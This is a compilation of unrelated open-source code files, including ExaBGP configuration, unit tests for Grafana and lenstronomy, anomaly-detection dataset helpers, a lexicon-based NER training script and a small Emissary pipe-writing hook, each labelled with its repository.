'help': 'reactor loop time\n%(space)s use only if you understand the code.' % _SPACE,
},
},
# Here for internal use
'debug': {
'pdb': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'enable python debugger on errors',
},
'memory': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'command line option --memory',
},
'configuration': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'undocumented option: raise when parsing configuration errors',
},
'selfcheck': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'does a self check on the configuration file',
},
'route': {
'read': parsing.unquote,
'write': parsing.quote,
'value': '',
'help': 'decode the route using the configuration',
},
'defensive': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'generate random fault in the code in purpose',
},
'rotate': {
'read': parsing.boolean,
'write': parsing.lower,
'value': 'false',
'help': 'rotate configurations file on reload (signal)',
},
},
}
# load the environment
Env.setup(CONFIGURATION)
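# Hedged illustration (not part of the original module): every section/option
# pair above is expected to become a setting reachable through Env and
# overridable from the environment, e.g. something along the lines of
#
#   exabgp.log.level=DEBUG exabgp.daemon.daemonize=true exabgp ./conf.ini
#
# The exact lookup/override mechanics live in
# exabgp.environment.environment.Env and are not shown here.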
|
tests/grafana_dashboards/test_exporter.py
|
Rvhappen/grafana-dashboard-builder
| 131 |
64906
|
# -*- coding: utf-8 -*-
# Copyright 2015-2019 grafana-dashboard-builder contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import pytest
from mock import patch, MagicMock
from grafana_dashboards.exporter import ProjectProcessor, FileExporter
__author__ = '<NAME> <<EMAIL>>'
def test_project_processor():
dashboard_processor = MagicMock()
processor = ProjectProcessor([dashboard_processor])
project = MagicMock()
context = MagicMock()
dashboard = MagicMock()
project.get_contexts.return_value = [context]
project.get_dashboards.return_value = [dashboard]
parent_context = MagicMock()
# noinspection PyTypeChecker
processor.process_projects([project], parent_context)
project.get_contexts.assert_called_once_with(parent_context)
dashboard.gen_json.assert_called_with(context)
context.expand_placeholders.assert_called_with(dashboard.name)
dashboard_processor.process_dashboard.assert_called_once_with(project.name, context.expand_placeholders(),
dashboard.gen_json())
@patch('grafana_dashboards.exporter.open', create=True)
@patch('json.dump')
@patch('os.makedirs', return_value=True)
@patch('os.path.isdir', return_value=True)
@patch('os.path.exists', return_value=True)
def test_file_exporter(patch_exists, path_isdir, makedirs, json_dump, mock_file):
exporter = FileExporter('output_folder')
dashboard_data = {'some_key': 'some_value'}
exporter.process_dashboard('project_name', 'dashboard_name', dashboard_data)
json_dump.assert_called_once_with(dashboard_data, mock_file().__enter__(), sort_keys=True, indent=2,
separators=(',', ': '))
@patch('os.makedirs', side_effect=[True, OSError('testing')])
@patch('os.path.isdir', return_value=True)
@patch('os.path.exists', return_value=False)
def test_file_exporter_path_not_exist(patch_exists, path_isdir, makedirs):
exporter = FileExporter('output_folder')
dashboard_data = {'some_key': 'some_value'}
with pytest.raises(Exception) as e:
exporter.process_dashboard('project_name', 'dashboard_name', dashboard_data)
assert 'testing' in str(e.value)
@patch('os.makedirs', return_value=True)
@patch('os.path.isdir', return_value=False)
@patch('os.path.exists', return_value=False)
def test_file_exporter_output_not_dir(patch_exists, path_isdir, makedirs):
with pytest.raises(Exception) as e:
FileExporter('output_folder')
assert "'output_folder' must be a directory" in str(e.value)
|
python/fcdd/datasets/offline_supervisor.py
|
kyungmin96/myfcdd
| 152 |
64918
|
from typing import List
import torch
from torch.utils.data.dataset import Dataset
def noise(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor,
nom_class: int, train_set: Dataset, gt: bool = False) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
:param gt: whether to provide ground-truth maps as well, atm not available!
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
if gt:
raise ValueError('No GT mode for pure noise available!')
anom = generated_noise.clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
train_set.data = data
train_set.targets = targets
return train_set
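# Hedged usage sketch for noise(): the random tensors below merely stand in for real
# nominal images and Outlier Exposure noise; the shapes and the outlier class index are
# illustrative assumptions, not part of this module.
def _noise_usage_sketch(train_set: Dataset) -> Dataset:
    """Build a train set whose anomalies are raw noise images (illustrative only)."""
    norm = torch.randint(0, 256, (64, 3, 32, 32), dtype=torch.uint8)  # fake nominal images
    generated_noise = torch.randint(0, 256, norm.shape)  # stand-in for OE-based noise
    return noise(outlier_classes=[1], generated_noise=generated_noise, norm=norm,
                 nom_class=0, train_set=train_set)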
def malformed_normal(outlier_classes: List[int], generated_noise: torch.Tensor, norm: torch.Tensor, nom_class: int,
train_set: Dataset, gt: bool = False, brightness_threshold: float = 0.11*255) -> Dataset:
"""
Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies.
Unlike above, the noise images are not directly utilized as anomalies, but added to nominal samples to
create malformed normal anomalies.
:param outlier_classes: a list of all outlier class indices.
:param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w).
:param norm: torch tensor of nominal images (n x c x h x w).
:param nom_class: the index of the class that is considered nominal.
:param train_set: some training dataset.
:param gt: whether to provide ground-truth maps as well.
:param brightness_threshold: if the average brightness (averaged over color channels) of a pixel exceeds this
threshold, the noise image's pixel value is subtracted instead of added.
This avoids adding brightness values to bright pixels, where approximately no effect is achieved at all.
:return: a modified dataset, with training data consisting of nominal samples and artificial anomalies.
"""
assert (norm.dim() == 4 or norm.dim() == 3) and generated_noise.shape == norm.shape
norm_dim = norm.dim()
if norm_dim == 3:
norm, generated_noise = norm.unsqueeze(1), generated_noise.unsqueeze(1) # assuming ch dim is skipped
anom = norm.clone()
# invert noise for bright regions (bright regions are considered being on average > brightness_threshold)
generated_noise = generated_noise.int()
bright_regions = norm.sum(1) > brightness_threshold * norm.shape[1]
for ch in range(norm.shape[1]):
gnch = generated_noise[:, ch]
gnch[bright_regions] = gnch[bright_regions] * -1
generated_noise[:, ch] = gnch
anom = (anom.int() + generated_noise).clamp(0, 255).byte()
data = torch.cat((norm, anom))
targets = torch.cat(
(torch.ones(norm.size(0)) * nom_class,
torch.ones(anom.size(0)) * outlier_classes[0])
)
if norm_dim == 3:
data = data.squeeze(1)
train_set.data = data
train_set.targets = targets
if gt:
gtmaps = torch.cat(
(torch.zeros_like(norm)[:, 0].float(), # 0 for nominal
(norm != anom).max(1)[0].clone().float()) # 1 for anomalous
)
if norm_dim == 4:
gtmaps = gtmaps.unsqueeze(1)
return train_set, gtmaps
else:
return train_set
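# Hedged usage sketch for malformed_normal() with ground-truth maps enabled; as above,
# the tensors are illustrative stand-ins only.
def _malformed_normal_usage_sketch(train_set: Dataset):
    """Return (train_set, gtmaps) built from fake nominal images (illustrative only)."""
    norm = torch.randint(0, 256, (64, 3, 32, 32), dtype=torch.uint8)  # fake nominal images
    generated_noise = torch.randint(0, 256, norm.shape)  # stand-in for OE-based noise
    return malformed_normal(outlier_classes=[1], generated_noise=generated_noise, norm=norm,
                            nom_class=0, train_set=train_set, gt=True)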
|
test/test_LensModel/test_Profiles/test_flexion.py
|
heather999/lenstronomy
| 107 |
64932
|
__author__ = 'sibirrer'
from lenstronomy.LensModel.Profiles.flexion import Flexion
from lenstronomy.LensModel.lens_model import LensModel
import numpy as np
import numpy.testing as npt
import pytest
class TestExternalShear(object):
"""
    tests the Flexion profile methods
"""
def setup(self):
self.flex = Flexion()
g1, g2, g3, g4 = 0.01, 0.02, 0.03, 0.04
self.kwargs_lens = {'g1': g1, 'g2': g2, 'g3': g3, 'g4': g4}
def test_function(self):
x = np.array([1])
y = np.array([2])
values = self.flex.function(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0], 0.135, decimal=5)
x = np.array([0])
y = np.array([0])
values = self.flex.function(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0], 0, decimal=5)
x = np.array([2, 3, 4])
y = np.array([1, 1, 1])
values = self.flex.function(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0], 0.09, decimal=5)
npt.assert_almost_equal(values[1], 0.18666666666666668, decimal=5)
def test_derivatives(self):
x = np.array([1])
y = np.array([2])
f_x, f_y = self.flex.derivatives(x, y, **self.kwargs_lens)
npt.assert_almost_equal(f_x[0], 0.105, decimal=5)
npt.assert_almost_equal(f_y[0], 0.15, decimal=5)
x = np.array([1, 3, 4])
y = np.array([2, 1, 1])
values = self.flex.derivatives(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0][0], 0.105, decimal=5)
npt.assert_almost_equal(values[1][0], 0.15, decimal=5)
def test_hessian(self):
x = np.array(1)
y = np.array(2)
f_xx, f_xy, f_yx, f_yy = self.flex.hessian(x, y, **self.kwargs_lens)
npt.assert_almost_equal(f_xx, 0.05, decimal=5)
npt.assert_almost_equal(f_yy, 0.11, decimal=5)
npt.assert_almost_equal(f_xy, 0.08, decimal=5)
npt.assert_almost_equal(f_xy, f_yx, decimal=8)
x = np.array([1,3,4])
y = np.array([2,1,1])
values = self.flex.hessian(x, y, **self.kwargs_lens)
npt.assert_almost_equal(values[0][0], 0.05, decimal=5)
npt.assert_almost_equal(values[3][0], 0.11, decimal=5)
npt.assert_almost_equal(values[2][0], 0.08, decimal=5)
npt.assert_almost_equal(values[1][0], 0.08, decimal=5)
def test_flexion(self):
x = np.array(0)
y = np.array(2)
flex = LensModel(['FLEXION'])
f_xxx, f_xxy, f_xyy, f_yyy = flex.flexion(x, y, [self.kwargs_lens])
npt.assert_almost_equal(f_xxx, self.kwargs_lens['g1'], decimal=9)
npt.assert_almost_equal(f_xxy, self.kwargs_lens['g2'], decimal=9)
npt.assert_almost_equal(f_xyy, self.kwargs_lens['g3'], decimal=9)
npt.assert_almost_equal(f_yyy, self.kwargs_lens['g4'], decimal=9)
def test_magnification(self):
ra_0, dec_0 = 1, -1
flex = LensModel(['FLEXION'])
g1, g2, g3, g4 = 0.01, 0.02, 0.03, 0.04
kwargs = {'g1': g1, 'g2': g2, 'g3': g3, 'g4': g4, 'ra_0': ra_0, 'dec_0': dec_0}
mag = flex.magnification(ra_0, dec_0, [kwargs])
npt.assert_almost_equal(mag, 1, decimal=8)
if __name__ == '__main__':
pytest.main()
|
aw_nas/weights_manager/headers/bifpn.py
|
Harald-R/aw_nas
| 195 |
64943
|
from aw_nas.weights_manager.wrapper import BaseHead
from .classifiers import BiFPNClassifier
__all__ = ["BiFPNHead"]
class BiFPNHead(BaseHead):
NAME = "bifpn_head"
    def __init__(
        self,
        device,
        num_classes,
        feature_channels,
        bifpn_out_channels,
        activation="swish",
        num_layers=4,
        has_background=True,
        pretrained_path=None,  # referenced below but missing from the original signature; default assumed
        schedule_cfg=None,
    ):
        super(BiFPNHead, self).__init__(schedule_cfg)
self.num_classes = num_classes
num_anchors = 9
self.reg = BiFPNClassifier(
bifpn_out_channels, num_anchors, 4, num_layers, activation
)
self.cls = BiFPNClassifier(
bifpn_out_channels,
num_anchors,
num_classes + int(has_background),
num_layers,
activation,
)
self.device = device
self.pretrained_path = pretrained_path
def forward(self, features):
return self.cls(features), self.reg(features)
|
docs/conf.py
|
richardsheridan/anyio
| 749 |
64956
|
#!/usr/bin/env python3
import pkg_resources
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx_autodoc_typehints'
]
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'AnyIO'
author = '<NAME>'
copyright = '2018, ' + author
v = pkg_resources.get_distribution('anyio').parsed_version
version = v.base_version
release = v.public
language = None
exclude_patterns = ['_build']
pygments_style = 'sphinx'
autodoc_default_options = {
'members': True,
'show-inheritance': True
}
todo_include_todos = False
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
htmlhelp_basename = 'anyiodoc'
intersphinx_mapping = {'python': ('https://docs.python.org/3/', None)}
|
doc/source/plots/spherharm42.py
|
dimpase/mpmath
| 625 |
64973
|
<reponame>dimpase/mpmath<filename>doc/source/plots/spherharm42.py
# Real part of spherical harmonic Y_(4,2)(theta,phi)
from mpmath import fp  # import added so the snippet also runs standalone (the doc build otherwise provides fp)
def Y(l,m):
def g(theta,phi):
R = abs(fp.re(fp.spherharm(l,m,theta,phi)))
x = R*fp.cos(phi)*fp.sin(theta)
y = R*fp.sin(phi)*fp.sin(theta)
z = R*fp.cos(theta)
return [x,y,z]
return g
fp.splot(Y(4,2), [0,fp.pi], [0,2*fp.pi], points=300)
|
main.py
|
RowitZou/Lexicon-nn
| 134 |
64975
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
# @Author: <NAME>
# @Last Modified by: <NAME>, Contact: <EMAIL>
import time
import sys
import argparse
import random
import torch
import gc
import pickle
import os
import torch.autograd as autograd
import torch.optim as optim
import numpy as np
from utils.metric import get_ner_fmeasure
from model.LGN import Graph
from utils.data import Data
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def lr_decay(optimizer, epoch, decay_rate, init_lr):
lr = init_lr * ((1-decay_rate)**epoch)
print( " Learning rate is setted as:", lr)
for param_group in optimizer.param_groups:
if param_group['name'] == 'aggr':
param_group['lr'] = lr * 2.
else:
param_group['lr'] = lr
return optimizer
def data_initialization(data, word_file, train_file, dev_file, test_file):
data.build_word_file(word_file)
if train_file:
data.build_alphabet(train_file)
data.build_word_alphabet(train_file)
if dev_file:
data.build_alphabet(dev_file)
data.build_word_alphabet(dev_file)
if test_file:
data.build_alphabet(test_file)
data.build_word_alphabet(test_file)
return data
def predict_check(pred_variable, gold_variable, mask_variable):
pred = pred_variable.cpu().data.numpy()
gold = gold_variable.cpu().data.numpy()
mask = mask_variable.cpu().data.numpy()
overlaped = (pred == gold)
right_token = np.sum(overlaped * mask)
total_token = mask.sum()
return right_token, total_token
def recover_label(pred_variable, gold_variable, mask_variable, label_alphabet):
batch_size = gold_variable.size(0)
seq_len = gold_variable.size(1)
mask = mask_variable.cpu().data.numpy()
pred_tag = pred_variable.cpu().data.numpy()
gold_tag = gold_variable.cpu().data.numpy()
pred_label = []
gold_label = []
for idx in range(batch_size):
pred = [label_alphabet.get_instance(pred_tag[idx][idy]) for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [label_alphabet.get_instance(gold_tag[idx][idy]) for idy in range(seq_len) if mask[idx][idy] != 0]
assert(len(pred)==len(gold))
pred_label.append(pred)
gold_label.append(gold)
return pred_label, gold_label
def print_args(args):
print("CONFIG SUMMARY:")
print(" Batch size: %s" % (args.batch_size))
print(" If use GPU: %s" % (args.use_gpu))
print(" If use CRF: %s" % (args.use_crf))
print(" Epoch number: %s" % (args.num_epoch))
print(" Learning rate: %s" % (args.lr))
print(" L2 normalization rate: %s" % (args.weight_decay))
print(" If use edge embedding: %s" % (args.use_edge))
print(" If use global node: %s" % (args.use_global))
print(" Bidirectional digraph: %s" % (args.bidirectional))
print(" Update step number: %s" % (args.iters))
print(" Attention dropout rate: %s" % (args.tf_drop_rate))
print(" Embedding dropout rate: %s" % (args.emb_drop_rate))
print(" Hidden state dimension: %s" % (args.hidden_dim))
print(" Learning rate decay ratio: %s" % (args.lr_decay))
print(" Aggregation module dropout rate: %s" % (args.cell_drop_rate))
print(" Head number of attention: %s" % (args.num_head))
print(" Head dimension of attention: %s" % (args.head_dim))
print("CONFIG SUMMARY END.")
sys.stdout.flush()
def evaluate(data, args, model, name):
if name == "train":
instances = data.train_Ids
elif name == "dev":
instances = data.dev_Ids
elif name == 'test':
instances = data.test_Ids
elif name == 'raw':
instances = data.raw_Ids
else:
print("Error: wrong evaluate name,", name)
exit(0)
pred_results = []
gold_results = []
    # set model in eval mode
model.eval()
batch_size = args.batch_size
start_time = time.time()
train_num = len(instances)
total_batch = train_num // batch_size + 1
for batch_id in range(total_batch):
start = batch_id*batch_size
end = (batch_id+1)*batch_size
if end > train_num:
end = train_num
instance = instances[start:end]
if not instance:
continue
word_list, batch_char, batch_label, mask = batchify_with_label(instance, args.use_gpu)
_, tag_seq = model(word_list, batch_char, mask)
pred_label, gold_label = recover_label(tag_seq, batch_label, mask, data.label_alphabet)
pred_results += pred_label
gold_results += gold_label
decode_time = time.time() - start_time
speed = len(instances) / decode_time
acc, p, r, f = get_ner_fmeasure(gold_results, pred_results)
return speed, acc, p, r, f, pred_results
def batchify_with_label(input_batch_list, gpu):
batch_size = len(input_batch_list)
chars = [sent[0] for sent in input_batch_list]
words = [sent[1] for sent in input_batch_list]
labels = [sent[2] for sent in input_batch_list]
sent_lengths = torch.LongTensor(list(map(len, chars)))
max_sent_len = sent_lengths.max()
char_seq_tensor = autograd.Variable(torch.zeros((batch_size, max_sent_len))).long()
label_seq_tensor = autograd.Variable(torch.zeros((batch_size, max_sent_len))).long()
mask = autograd.Variable(torch.zeros((batch_size, max_sent_len))).byte()
for idx, (seq, label, seq_len) in enumerate(zip(chars, labels, sent_lengths)):
char_seq_tensor[idx, :seq_len] = torch.LongTensor(seq)
label_seq_tensor[idx, :seq_len] = torch.LongTensor(label)
mask[idx, :seq_len] = torch.Tensor([1] * int(seq_len))
if gpu:
char_seq_tensor = char_seq_tensor.cuda()
label_seq_tensor = label_seq_tensor.cuda()
mask = mask.cuda()
return words, char_seq_tensor, label_seq_tensor, mask
def train(data, args, saved_model_path):
print( "Training model...")
model = Graph(data, args)
if args.use_gpu:
model = model.cuda()
print('# generated parameters:', sum(param.numel() for param in model.parameters()))
print( "Finished built model.")
best_dev_epoch = 0
best_dev_f = -1
best_dev_p = -1
best_dev_r = -1
best_test_f = -1
best_test_p = -1
best_test_r = -1
# Initialize the optimizer
aggr_module_params = []
other_module_params = []
for m_name in model._modules:
m = model._modules[m_name]
if isinstance(m, torch.nn.ModuleList):
for p in m.parameters():
if p.requires_grad:
aggr_module_params.append(p)
else:
for p in m.parameters():
if p.requires_grad:
other_module_params.append(p)
optimizer = optim.Adam([
{"params": (aggr_module_params), "name": "aggr"},
{"params": (other_module_params), "name": "other"}
],
lr=args.lr,
weight_decay=args.weight_decay
)
for idx in range(args.num_epoch):
epoch_start = time.time()
temp_start = epoch_start
print(("Epoch: %s/%s" %(idx, args.num_epoch)))
optimizer = lr_decay(optimizer, idx, args.lr_decay, args.lr)
sample_loss = 0
batch_loss = 0
total_loss = 0
right_token = 0
whole_token = 0
random.shuffle(data.train_Ids)
        # set model in train mode
model.train()
model.zero_grad()
batch_size = args.batch_size
train_num = len(data.train_Ids)
total_batch = train_num // batch_size + 1
for batch_id in range(total_batch):
# Get one batch-sized instance
start = batch_id * batch_size
end = (batch_id + 1) * batch_size
if end > train_num:
end = train_num
instance = data.train_Ids[start:end]
if not instance:
continue
word_list, batch_char, batch_label, mask = batchify_with_label(instance, args.use_gpu)
loss, tag_seq = model(word_list, batch_char, mask, batch_label)
right, whole = predict_check(tag_seq, batch_label, mask)
right_token += right
whole_token += whole
sample_loss += loss.data
total_loss += loss.data
batch_loss += loss
if end % 500 == 0:
temp_time = time.time()
temp_cost = temp_time - temp_start
temp_start = temp_time
print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f" %
(end, temp_cost, sample_loss, right_token, whole_token, (right_token+0.)/whole_token)))
sys.stdout.flush()
sample_loss = 0
if end % args.batch_size == 0:
batch_loss.backward()
optimizer.step()
model.zero_grad()
batch_loss = 0
temp_time = time.time()
temp_cost = temp_time - temp_start
print((" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f" %
(end, temp_cost, sample_loss, right_token, whole_token, (right_token+0.)/whole_token)))
epoch_finish = time.time()
epoch_cost = epoch_finish - epoch_start
print(("Epoch: %s training finished. Time: %.2fs, speed: %.2fst/s, total loss: %s" %
(idx, epoch_cost, train_num/epoch_cost, total_loss)))
# dev
speed, acc, dev_p, dev_r, dev_f, _ = evaluate(data, args, model, "dev")
dev_finish = time.time()
dev_cost = dev_finish - epoch_finish
print(("Dev: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f" %
(dev_cost, speed, acc, dev_p, dev_r, dev_f)))
# test
speed, acc, test_p, test_r, test_f, _ = evaluate(data, args, model, "test")
test_finish = time.time()
test_cost = test_finish - dev_finish
print(("Test: time: %.2fs, speed: %.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f" %
(test_cost, speed, acc, test_p, test_r, test_f)))
if dev_f > best_dev_f:
print("Exceed previous best f score: %.4f" % best_dev_f)
torch.save(model.state_dict(), saved_model_path + "_best")
best_dev_p = dev_p
best_dev_r = dev_r
best_dev_f = dev_f
best_dev_epoch = idx + 1
best_test_p = test_p
best_test_r = test_r
best_test_f = test_f
model_idx_path = saved_model_path + "_" + str(idx)
torch.save(model.state_dict(), model_idx_path)
with open(saved_model_path + "_result.txt", "a") as file:
file.write(model_idx_path + '\n')
file.write("Dev score: %.4f, r: %.4f, f: %.4f\n" % (dev_p, dev_r, dev_f))
file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n" % (test_p, test_r, test_f))
file.close()
print("Best dev epoch: %d" % best_dev_epoch)
print("Best dev score: p: %.4f, r: %.4f, f: %.4f" % (best_dev_p, best_dev_r, best_dev_f))
print("Best test score: p: %.4f, r: %.4f, f: %.4f" % (best_test_p, best_test_r, best_test_f))
gc.collect()
with open(saved_model_path + "_result.txt", "a") as file:
file.write("Best epoch: %d" % best_dev_epoch + '\n')
file.write("Best Dev score: %.4f, r: %.4f, f: %.4f\n" % (best_dev_p, best_dev_r, best_dev_f))
file.write("Test score: %.4f, r: %.4f, f: %.4f\n\n" % (best_test_p, best_test_r, best_test_f))
file.close()
with open(saved_model_path + "_best_HP.config", "wb") as file:
pickle.dump(args, file)
def load_model_decode(model_dir, data, args, name):
model_dir = model_dir + "_best"
print("Load Model from file: ", model_dir)
model = Graph(data, args)
model.load_state_dict(torch.load(model_dir))
# load model need consider if the model trained in GPU and load in CPU, or vice versa
if args.use_gpu:
model = model.cuda()
print(("Decode %s data ..." % name))
start_time = time.time()
speed, acc, p, r, f, pred_results = evaluate(data, args, model, name)
end_time = time.time()
time_cost = end_time - start_time
print(("%s: time:%.2fs, speed:%.2fst/s; acc: %.4f, p: %.4f, r: %.4f, f: %.4f" %
(name, time_cost, speed, acc, p, r, f)))
return pred_results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--status', choices=['train', 'test', 'decode'], help='Function status.', default='train')
parser.add_argument('--use_gpu', type=str2bool, default=True)
parser.add_argument('--train', help='Training set.', default='data/onto4ner.cn/train.char.bmes')
parser.add_argument('--dev', help='Developing set.', default='data/onto4ner.cn/dev.char.bmes')
parser.add_argument('--test', help='Testing set.', default='data/onto4ner.cn/test.char.bmes')
parser.add_argument('--raw', help='Raw file for decoding.')
parser.add_argument('--output', help='Output results for decoding.')
parser.add_argument('--saved_set', help='Path of saved data set.', default='data/onto4ner.cn/saved.dset')
parser.add_argument('--saved_model', help='Path of saved model.', default="saved_model/model_onto4ner")
parser.add_argument('--char_emb', help='Path of character embedding file.', default="data/gigaword_chn.all.a2b.uni.ite50.vec")
parser.add_argument('--word_emb', help='Path of word embedding file.', default="data/ctb.50d.vec")
parser.add_argument('--use_crf', type=str2bool, default=True)
parser.add_argument('--use_edge', type=str2bool, default=True, help='If use lexicon embeddings (edge embeddings).')
parser.add_argument('--use_global', type=str2bool, default=True, help='If use the global node.')
parser.add_argument('--bidirectional', type=str2bool, default=True, help='If use bidirectional digraph.')
parser.add_argument('--seed', help='Random seed', default=1023, type=int)
parser.add_argument('--batch_size', help='Batch size.', default=1, type=int)
parser.add_argument('--num_epoch',default=100, type=int, help="Epoch number.")
parser.add_argument('--iters', default=4, type=int, help='The number of Graph iterations.')
parser.add_argument('--hidden_dim', default=50, type=int, help='Hidden state size.')
parser.add_argument('--num_head', default=10, type=int, help='Number of transformer head.')
parser.add_argument('--head_dim', default=20, type=int, help='Head dimension of transformer.')
parser.add_argument('--tf_drop_rate', default=0.1, type=float, help='Transformer dropout rate.')
parser.add_argument('--emb_drop_rate', default=0.5, type=float, help='Embedding dropout rate.')
parser.add_argument('--cell_drop_rate', default=0.2, type=float, help='Aggregation module dropout rate.')
parser.add_argument('--word_alphabet_size', type=int, help='Word alphabet size.')
parser.add_argument('--char_alphabet_size', type=int, help='Char alphabet size.')
parser.add_argument('--label_alphabet_size', type=int, help='Label alphabet size.')
parser.add_argument('--char_dim', type=int, help='Char embedding size.')
parser.add_argument('--word_dim', type=int, help='Word embedding size.')
parser.add_argument('--lr', type=float, default=2e-05)
parser.add_argument('--lr_decay', type=float, default=0)
parser.add_argument('--weight_decay', type=float, default=0)
args = parser.parse_args()
status = args.status.lower()
seed_num = args.seed
random.seed(seed_num)
torch.manual_seed(seed_num)
np.random.seed(seed_num)
train_file = args.train
dev_file = args.dev
test_file = args.test
raw_file = args.raw
output_file = args.output
saved_set_path = args.saved_set
saved_model_path = args.saved_model
char_file = args.char_emb
word_file = args.word_emb
if status == 'train':
if os.path.exists(saved_set_path):
print('Loading saved data set...')
with open(saved_set_path, 'rb') as f:
data = pickle.load(f)
else:
data = Data()
data_initialization(data, word_file, train_file, dev_file, test_file)
data.generate_instance_with_words(train_file, 'train')
data.generate_instance_with_words(dev_file, 'dev')
data.generate_instance_with_words(test_file, 'test')
data.build_char_pretrain_emb(char_file)
data.build_word_pretrain_emb(word_file)
if saved_set_path is not None:
print('Dumping data...')
with open(saved_set_path, 'wb') as f:
pickle.dump(data, f)
data.show_data_summary()
args.word_alphabet_size = data.word_alphabet.size()
args.char_alphabet_size = data.char_alphabet.size()
args.label_alphabet_size = data.label_alphabet.size()
args.char_dim = data.char_emb_dim
args.word_dim = data.word_emb_dim
print_args(args)
train(data, args, saved_model_path)
elif status == 'test':
assert not (test_file is None)
if os.path.exists(saved_set_path):
print('Loading saved data set...')
with open(saved_set_path, 'rb') as f:
data = pickle.load(f)
else:
print("Cannot find saved data set: ", saved_set_path)
exit(0)
data.generate_instance_with_words(test_file, 'test')
with open(saved_model_path + "_best_HP.config", "rb") as f:
args = pickle.load(f)
data.show_data_summary()
print_args(args)
load_model_decode(saved_model_path, data, args, "test")
elif status == 'decode':
assert not (raw_file is None or output_file is None)
if os.path.exists(saved_set_path):
print('Loading saved data set...')
with open(saved_set_path, 'rb') as f:
data = pickle.load(f)
else:
print("Cannot find saved data set: ", saved_set_path)
exit(0)
data.generate_instance_with_words(raw_file, 'raw')
with open(saved_model_path + "_best_HP.config", "rb") as f:
args = pickle.load(f)
data.show_data_summary()
print_args(args)
decode_results = load_model_decode(saved_model_path, data, args, "raw")
data.write_decoded_results(output_file, decode_results, 'raw')
else:
print("Invalid argument! Please use valid arguments! (train/test/decode)")
|
scripts/hello.py
|
LukeB42/Emissary
| 193 |
64992
|
# _*_ coding: utf-8 _*_
#
# This script creates a named pipe (if it doesn't exist)
# and writes the feed name, article title and url to it
# whenever an article is saved to the database.
#
# This is useful for composing systems that constantly read
# the FIFO and do things like emit the data to IRC channels.
#
# You could, for instance, perform fuzzy pattern matching and be
# notified when certain keywords are in the news.
#
# Transmission to a natural language processing/translation service
# can also be done in a script or by reading a FIFO like the one here.
#
# Whether you use this system to profit, perform intelligence analysis
# or inform your next vote is hopefully up to you!
#
# <NAME>, 2015
# MIT License
# Many big thanks to God, lord of universes.
fifo = "/tmp/emissary.pipe"
import os, stat
if not os.path.exists(fifo):
try:
os.mkfifo(fifo)
    except Exception as e:
cache['app'].log("Error creating %s: %s" % (fifo, e.message))
# Emissary always executes scripts with an article and its feed in the namespace.
# There is also a dictionary named cache, containing the app object.
# Random aside but through the app object you can access the logging interface and the feed manager.
try:
# READER BEWARE: Use non-blocking IO or you won't be storing owt.
fd = os.open(fifo, os.O_CREAT | os.O_WRONLY | os.O_NONBLOCK)
os.write(fd, "%s: %s\n%s\n" % (feed.name, article.title, article.url))
os.close(fd)
del fd
except Exception as e: # Usually due to there not being a reader fd known to the kernel.
pass
del os, stat, fifo
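# A possible companion reader (hedged sketch; run it as a separate process, it is not
# executed by Emissary): block on the FIFO and print each saved article as it arrives.
#
#   with open("/tmp/emissary.pipe") as pipe:
#       for line in pipe:
#           print(line.rstrip())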
|
third_party/blink/tools/blinkpy/web_tests/port/port_testcase.py
|
zealoussnow/chromium
| 14,668 |
64997
|
<gh_stars>1000+
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
